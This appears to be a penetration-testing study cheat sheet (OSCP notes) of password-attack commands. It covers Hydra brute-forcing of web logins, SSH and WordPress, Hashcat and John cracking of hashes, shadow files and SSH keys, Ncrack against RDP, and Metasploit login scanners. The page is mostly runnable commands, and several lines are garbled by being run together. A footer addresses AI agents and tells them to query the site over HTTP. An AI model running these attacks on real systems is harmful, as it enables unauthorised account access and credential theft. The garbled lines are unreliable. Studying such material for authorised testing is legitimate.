# Brute Force Password Attacks & Cracking

## John The Ripper <a href="#john-the-ripper" id="john-the-ripper"></a>

```
john --wordlist=/usr/share/wordlists/rockyou.txt -format=$format hash.txt
```

## Hydra <a href="#hydra" id="hydra"></a>

To brute force the web form using Hydra the following information is required:

* IP address
* GET/POST request: http-get-form or http-post-form
* Username: -l for a static username or -L for a list of usernames
* Password: -p for a static password or -P for a password list
* Number of threads is optional: -t

```
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error

hydra $ip -l $username -P [password list] [http form type] ":​hydra -L <username list> -p <password list> [host] http-post-form "::"​hydra -L <wordlist> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"​​hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V​hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh​hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh​hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4  -v​hydra $TARGET http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list
```

## Hashcat <a href="#hashcat" id="hashcat"></a>

```
hashcat -m $hashtype -a $attackmode -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt​hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force
```

* `m` is the hash format (e.g. m 13100 is Kerberos 5)
* `a 0` is a dictionary attack
* `o cracked.txt` is the output file for the cracked password
* `target_hashes.txt` is the hash to be cracked
* `/usr/share/wordlists/rockyou.txt` is the absolute path to the wordlist
* `--force` is something I always have to add (think it's GPU-related)

## Ncrack <a href="#ncrack" id="ncrack"></a>

Ncrack can be used to crack RDP passwords:

```
ncrack -vv --user username -P password-file.txt rdp://[host]
```

```
msf > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(mysql_login) > set rhosts [target]msf auxiliary(mysql_login) > set rport [port]msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txtmsf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txtmsf auxiliary(mysql_login) > run
```

By default, Metasploit will use its list of default Tomcat usernames and passwords, but you could set a single username with `set username` or run a custom list with `set user_file`. You can also run a longer password list with `set pass_file`. Depending on how fast the server responds, you could use a big wordlist but otherwise stick to `fasttrack.txt`.

```
msf > use auxiliary/scanner/http/tomcat_mgr_loginmsf auxiliary(tomcat_mgr_login) > set rhosts [target]msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080]msf auxiliary(tomcat_mgr_login) > set ssl truemsf auxiliary(tomcat_mgr_login) > set stop_on_success truemsf auxiliary(tomcat_mgr_login) > run
```

### Cracking Wordpress Password with WPScan

```
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
```

### Crack Zipfiles

```
https://www.geeksforgeeks.org/recover-password-password-protected-zip-file/
fcrackzip -v -D -u -p /usr/share/dict/words secret.zip
```

### Find SSH Keyphrase with John - Crack SSH Private Key

First we’ll need to convert the ssh key using ssh2john with this command. Crack ssh.

```
python ssh2john.py SecretKey > SecretKey.hash
#After give it to john…
sudo john SecretKey.hash -wordlist=INSERTWORDLIST!
```

### Crack shadow or Passwd File

```
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/sqlmap.txt passwords.txt
john --show passwords.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rabakuku.gitbook.io/oscp/password-attack-1/bruteforce.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.